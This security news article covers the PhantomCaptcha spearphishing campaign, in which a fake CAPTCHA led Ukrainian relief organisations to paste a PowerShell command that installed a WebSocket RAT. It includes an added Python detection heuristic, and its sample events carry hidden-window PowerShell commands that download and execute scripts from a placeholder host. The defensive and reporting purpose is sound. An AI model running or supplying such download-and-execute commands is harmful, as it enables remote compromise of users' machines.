One-day ‘PhantomCaptcha’ spearphishing campaign delivered WebSocket RAT to Ukraine relief organizations

A targeted spearphishing campaign that ran for a single day attempted to compromise members of a Ukrainian regional government administration and organisations involved in the country's war relief effort, including the International Committee of the Red Cross, UNICEF and several non-governmental groups. Security researchers named the operation PhantomCaptcha.

E-mails impersonating the Ukrainian President's Office carried malicious PDF attachments that linked to a domain impersonating the Zoom service (zoomconference.app). Visitors who followed the link were shown an automated browser check that generated a client identifier and sent it to the attacker's server over a WebSocket connection, according to SentinelLABS' analysis.

If the WebSocket server answered with a matching identifier, the victim's browser was redirected to a legitimate, password-protected Zoom meeting; otherwise the site presented a fake CAPTCHA in Ukrainian. Its instructions told users to copy a token and paste it into a Windows command prompt, which ran a PowerShell command that downloaded and executed a malicious script named cptch. The user, not an exploit, launches the first stage, so the initial execution is a PowerShell process spawned from an interactive shell.
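The copy-and-paste lure above leaves a characteristic trace in process-creation telemetry: a PowerShell download cradle whose parent is the shell the victim pasted into. The following is an added example, not code from SentinelLABS' report or from the campaign itself, of a heuristic that scores such events. The field names, the parent-process list and the cradle and evasion patterns are assumptions drawn from the general ClickFix pattern; the sample events are constructed, the page does not give the actual command the lure used, and `example.invalid` stands in for the real download host.

```python
"""Heuristic detection of paste-into-command-prompt PowerShell lures.

Input events mimic Sysmon EventID 1 / Windows 4688 fields (constructed here).
Added example; assumptions: parent set, regexes and scoring are ours.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # basename of the parent process, e.g. cmd.exe
    image: str          # basename of the created process
    command_line: str   # full command line as logged


# Shells a user pastes a lure into (assumption: typical ClickFix parents).
INTERACTIVE_PARENTS = {"cmd.exe", "explorer.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-and-run primitives (assumed cradle vocabulary, not from the page).
CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|"
    r"downloadfile|net\.webclient|\biex\b|invoke-expression|\bcurl\b)",
    re.I,
)
# Flags that hide the window or disable policy/profile checks.
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})",
    re.I,
)


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    reasons: list[str] = []
    if ev.image.lower() not in POWERSHELL:
        return 0, reasons
    if ev.parent_image.lower() in INTERACTIVE_PARENTS:
        reasons.append("launched from interactive shell")
    if CRADLE.search(ev.command_line):
        reasons.append("download cradle in command line")
    if EVASION.search(ev.command_line):
        reasons.append("window hiding / policy bypass flags")
    return len(reasons), reasons


def is_clickfix_like(ev: ProcessEvent) -> bool:
    """A cradle is required; an interactive parent or evasion flag confirms it.
    A lone cradle from a scheduled task is not enough, and a lone interactive
    PowerShell launch is an admin opening a console."""
    _, reasons = score_event(ev)
    return "download cradle in command line" in reasons and len(reasons) >= 2


def detect(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, list[str]]]:
    return [(ev, score_event(ev)[1]) for ev in events if is_clickfix_like(ev)]


# Constructed sample events (not real telemetry from the campaign).
SAMPLE_EVENTS = [
    ProcessEvent("cmd.exe", "powershell.exe",
                 "powershell -w hidden -c \"iex (iwr 'https://example.invalid/cptch' -UseBasicParsing)\""),
    ProcessEvent("services.exe", "powershell.exe",
                 "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 "powershell irm https://example.invalid/x | iex"),
]

if __name__ == "__main__":
    for ev, why in detect(SAMPLE_EVENTS):
        print(f"ALERT {ev.parent_image} -> {ev.image}: {'; '.join(why)}")
```

The cradle match is the mandatory term so that an administrator opening a console from Explorer, or a backup job launched by the service control manager with `-ExecutionPolicy Bypass`, does not alert on its own; tune the parent set to include the Run dialog's host and any terminal emulators in your environment.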

The cptch component acted as a reconnaissance and system-profiling tool, collecting the computer name, domain information, username, process ID and system UUID and sending the data to a command-and-control server. A lightweight WebSocket remote access trojan (RAT), delivered as the final payload, provided remote command execution and data exfiltration, with commands carried as base64-encoded JSON.

Researchers reported that the short-lived October 8 campaign was linked to a later operation in Lviv that used adult-themed Android APKs or cloud storage tools to install spyware which monitored real-time location, call logs, contacts and images. SentinelLABS did not attribute the PhantomCaptcha campaign, but noted that the RAT was hosted on Russian infrastructure and said the Android activity may be tied to development originating in Russia or Belarus.

The researchers also said the threat actor spent months preparing the operation, with some of the domains used in the attack registered at the end of March. A separate report by Google Threat Intelligence Group described similar 'I am not a robot' CAPTCHA challenges used by a group tracked as ColdRiver, which some attribute to Russian intelligence.